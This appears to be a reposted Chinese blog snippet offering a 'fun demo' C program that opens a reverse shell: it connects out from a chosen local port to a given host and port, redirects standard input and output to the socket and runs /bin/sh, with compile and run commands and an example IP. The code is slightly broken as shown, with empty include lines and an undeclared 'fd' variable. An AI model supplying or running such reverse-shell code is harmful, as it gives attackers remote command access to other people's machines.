NC反弹的小demo

前端之家收集整理的这篇文章主要介绍了NC反弹的小demo前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。

一个有趣的NC反弹shell的demo

#include  
#include  
#include  
#include  
#include  
void error(char *msg)  
{  
    perror(msg);  
    exit(0);  
}  
int main(int argc,char *argv[])  
{  
    int sockfd,portno,lportno,n;  
    struct sockaddr_in serv_addr;  
    struct sockaddr_in client_addr;  
    struct hostent *server;  
    char buffer[256];  
    if (argc < 3) {  
        fprintf(stderr,"usage %s hostname port LocalPortn",argv[0]);  
        exit(0);  
    } //三个参数,目标主机,目标主机端口,本地源端口  
    portno = atoi(argv[2]);  
    sockfd = socket(AF_INET,SOCK_STREAM,0);  
    if (sockfd < 0)  
    error("ERROR opening socket");  
    bzero((char *) &client_addr,sizeof(client_addr));  
    lportno = atoi(argv[3]);  
    client_addr.sin_family = AF_INET;  
    client_addr.sin_addr.s_addr = INADDR_ANY;  
    client_addr.sin_port = htons(lportno); //设置源端口  
    if (bind(sockfd,(struct sockaddr *) &client_addr,sizeof(client_addr)) < 0)  
    error("ERROR on binding");  
    server = gethostbyname(argv[1]);  
    if (server == NULL) {  
    fprintf(stderr,"ERROR,no such host ");  
    exit(0);  
    }  
        bzero((char *) &serv_addr,sizeof(serv_addr));  
    serv_addr.sin_family = AF_INET;  
    bcopy((char *)server->h_addr,(char *)&serv_addr.sin_addr.s_addr,server->h_length);  
    serv_addr.sin_port = htons(portno);  
    if (connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0) //连接  
    error("ERROR connecting");  
    dup2(fd,0);  
    dup2(fd,1);  
    dup2(fd,2);  
    execl("/bin/sh","sh -i",NULL); //执行shell  
    close(fd);  
}

编译后执行时候

gcc client-port.c -o port  
    chmod +x port  
    ./port  你的IP 你的监听端口 本地的源端口

eg

./port 111.111.111.111 80 80

猜你在找的Bash相关文章